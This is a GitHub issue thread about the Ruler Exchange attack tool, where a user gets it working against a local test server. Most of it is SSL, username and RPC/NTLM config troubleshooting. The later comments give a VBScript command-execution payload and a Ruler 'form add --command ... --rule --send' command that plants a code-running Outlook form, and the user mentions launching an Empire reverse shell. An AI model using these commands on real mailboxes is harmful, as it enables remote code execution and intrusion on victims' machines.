### ISSUE TITLE
Some about error code 255

### ISSUE THREAD

**Issue by X1n9** [sensepost/ruler#50]
hi
i watched our YouTube video,
Ruler is so cool that I want to achieve it on my local exchange service and i use outlook 2016
But now i have some connection problems then i search a lot not found any tips valid don't know how 
Some wrong with:
![img_2866](https://user-images.githubusercontent.com/21193133/29757552-3d5ce572-8bdf-11e7-9653-fe285e6df6cf.JPG)

**Comment by staaldraad** [comment]
Hi! 

It looks like your test server is presenting an invalid SSL certificate. You can bypass the security check using ```--insecure```

I also think your first attempt, which ended with "Access Denied" might be because of the ```--domain``` option. This should work:

```
go run ruler.go --insecure -e lfkc@ansock.com -p xxxxxx --verbose check
```

and then:
```
go run ruler.go --insecure -e lfkc@ansock.com -p xxxxxx form display
```

I hope that helps,

**Comment by X1n9** [comment]
yeah ,cool man,
i am trying ur idea,  it doesn't seem to work 
My outlook client login via imap or pop3 could reach.
Is any config of service trouble?
![img_0118](https://user-images.githubusercontent.com/21193133/29802503-2183964c-8ca8-11e7-9846-449ec4c3c809.JPG)

**Comment by X1n9** [comment]
add
![img_0119](https://user-images.githubusercontent.com/21193133/29807121-fe4451c2-8cc4-11e7-891d-6aee6cba1dbb.JPG)

**Comment by staaldraad** [comment]
Hi again

can you try without ```--domain``` ?

This request seems like the correct one:

```
go run ruler.go --insecure -e lfkc@an.com -p A123456*** --verbose check
```

The ```--domain ``` is used to supply in the internal domain name used by active directory. When you exclude this, the exchange server normally defaults to the correct domain.

You can also try go to the autodiscover URL in your browser and verify that the page is available. If you go to https://autodiscover.an.com/autodiscover/autodiscover.xml you should get the response:
```
<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
    <Error Time="21:25:04.8897083" Id="4130155072">
      <ErrorCode>600</ErrorCode>
      <Message>Invalid Request</Message>
      <DebugData />
    </Error>
  </Response>
</Autodiscover>
```

**Comment by X1n9** [comment]
Show my config file 
![img_0120](https://user-images.githubusercontent.com/21193133/29807427-8f278028-8cc6-11e7-81f7-66b396e41d16.JPG)

**Comment by X1n9** [comment]
yeah again . Actually I have tried it yesterday. It not worked efficiently 
Look at those pics..
![img_0121](https://user-images.githubusercontent.com/21193133/29807769-fb75545c-8cc7-11e7-86bf-c6cde03f2c22.JPG)
![img_0122](https://user-images.githubusercontent.com/21193133/29807770-fbe44614-8cc7-11e7-80e7-c7eba2af5a43.JPG)
![img_0123](https://user-images.githubusercontent.com/21193133/29807771-fbe6157a-8cc7-11e7-8b90-7fc92e244cd7.JPG)

**Comment by staaldraad** [comment]
ah! I've been blind and not spotting the missing username! I think that will (hopefully) fix it :+1: 

```
go run ruler.go --insecure -u lfkc -e lfkc@an.com -p A123456*** --verbose check
```

**Comment by X1n9** [comment]
hi hi yea 
New found hah
On my win10 ubuntu bash:
![img_0124](https://user-images.githubusercontent.com/21193133/29808248-dde23e8a-8cc9-11e7-9245-39a957c2caac.JPG)
![img_0125](https://user-images.githubusercontent.com/21193133/29808249-de4165b8-8cc9-11e7-9b93-323f17e30431.JPG)

On my kali test:
![img_0126](https://user-images.githubusercontent.com/21193133/29808271-efee45e2-8cc9-11e7-93ba-11170a293bb4.JPG)

Two different results,ah ,I think may somewhere setting error

**Comment by staaldraad** [comment]
Woot! Progress :) 

It seems like the RPC end-point isn't being set correctly. Your config file should work here, 
```
go run ruler.go --insecure -u lfkc -e lfkc@an.com -p A123456*** --verbose --config config.yml check
```

You will need to change the config so that it has: ```rpc: true```

**Comment by X1n9** [comment]
Then I tried to use _config file,
Setting Rpcurl https:mail.an.com/rpm/rpcproxy:6001 then get 401 status code
Is rpcurl incorrect? 
![img_0127](https://user-images.githubusercontent.com/21193133/29809116-7142a338-8ccd-11e7-8927-0df480304a62.JPG)

**Comment by X1n9** [comment]
And my config set 
![img_0128](https://user-images.githubusercontent.com/21193133/29809249-0044b4ae-8cce-11e7-8b25-0cb3c9e311e5.JPG)

**Comment by staaldraad** [comment]
I see the config file is missing "ntlm: true" 

It should be between "rpcencrypt" and "mapiurl":

```
rpcurl: "https://mail.an.com/rpc/rpcproxy.dll"
rpc: true 
rpcencrypt: true
ntlm: true 
mapiurl: "https://exchange.an.com/mapi/emsmdb/"
```

If you get unauthorised again, you can try changing it to "false"

Not sure why Ruler is struggling so much to pick up the values from autodiscover in this instance, sorry :(

**Comment by X1n9** [comment]
Wow!
Thx ur so so cool and awesome idea.
I can conn it very soon.!!!!
Appreciate your reply !!!!!!!
Yeh 
Then I try send payload to my account for more test
It seems powershell doesn't run . 
Because My outlook version is 2016? I known it isn't is newest version...
![img_0129](https://user-images.githubusercontent.com/21193133/29812430-1eb82550-8cd9-11e7-99d8-df5b21ac66a3.JPG)

**Comment by staaldraad** [comment]
Great! Happy to hear it is closer!

Outlook 2016 will work, can you try with this VBScript?

```
CreateObject("Wscript.Shell").Run "calc.exe", 0, False
```

You can also use ```--rule``` to trigger the form automatically:

```
form add --suffix xyz --command 'CreateObject("Wscript.Shell").Run "calc.exe", 0, False' --rule --send
```

**Comment by X1n9** [comment]
Bingo 
This is run call.exe
![img_0130](https://user-images.githubusercontent.com/21193133/29814348-99da57c0-8cdf-11e7-8da1-ba3bd030436c.JPG)

This is run my empire reverse-shell (first try)
![img_0131](https://user-images.githubusercontent.com/21193133/29814350-9a2bcc04-8cdf-11e7-9af0-514332b3eeb6.JPG)


Either of them start running

**Comment by X1n9** [comment]
hi ，
So great 
finally i complete it ！

I tried it at Win7 is okay 
But it in win10 08 ,it doesn't work anymore 
Looks like win10 or 08 is strictly for that vb form running

**Comment by staaldraad** [comment]
Hey!

Strange that win10 is failing, I've just tested to double check and it worked. What version are you using?

I tested using:
```
Win10: Version 1703 (OS Build 15063.540)
Outlook 2016: 16.0.4549.1000 (32-bit)
```

**Comment by X1n9** [comment]
Yeah .
my win10 is x64 system.
Tomorrow i will try this test with x86 win10 
3q ur reply
